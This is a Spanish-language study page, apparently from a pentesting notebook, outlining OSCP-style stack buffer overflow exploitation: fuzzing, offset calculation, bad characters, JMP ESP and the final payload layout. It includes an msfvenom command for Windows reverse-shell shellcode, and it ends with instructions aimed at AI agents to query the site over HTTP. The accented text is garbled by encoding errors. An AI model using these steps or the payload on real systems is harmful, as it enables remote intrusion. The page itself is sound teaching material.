# Buffer Overflow (Stack) La base de la explotaci贸n binaria. Si controlas el EIP, controlas el flujo. ## 馃洃 Metodolog铆a Paso a Paso (OSCP Style) ### 1. Spiking & Fuzzing Encontrar qu茅 comando y cu谩ntos bytes crashean la aplicaci贸n. * Script Python para enviar 'A's incrementales. ### 2. Finding the Offset 驴En qu茅 posici贸n exacta de esas 2000 'A's se sobrescribe el EIP? 1. Generar patr贸n 煤nico: ```bash /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 3000 ``` 2. Crashear app con el patr贸n y leer valor de EIP (ej: `396F4338`). 3. Calcular offset: ```bash /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 3000 -q 396F4338 ``` ### 3. Overwriting EIP Confirmar control total. ```mermaid graph TD A[Buffer Start] -->|'A' * Offset| B[EIP (Instruction Pointer)] B -->|'B' * 4| C[ESP (Stack Pointer)] C -->|Shellcode| D[Malicious Code Execution] style B fill:#f96,stroke:#333 style D fill:#f9f,stroke:#333 ``` * Payload: `padding + "B"*4 + trailing`. * El EIPdeber铆a ser `42424242`. ### 4. Bad Characters Identificar bytes que la aplicaci贸n no procesa bien (ej: `\x00`, `\x0a`). * Enviar array `\x01` a `\xff`. * Comparar en memoria (Immunity Debugger -> `!mona compare`). ### 5. Finding JMP ESP Necesitamos una direcci贸n de memoria est谩tica que haga "salto a la pila" donde estar谩 nuestra shellcode. * `!mona jmp -r esp -cpb "\x00..."` ### 6. Generate Shellcode ```bash msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 EXITFUNC=thread -f c -a x86 -b "\x00" ``` ### 7. The Exploit Estructura final: `Padding (A) + JMP ESP Address + NOPs (\x90 * 16) + Shellcode` --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://jotatito05.gitbook.io/la-bitacora-de-jotatito05/06.-exploitation/methodology.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.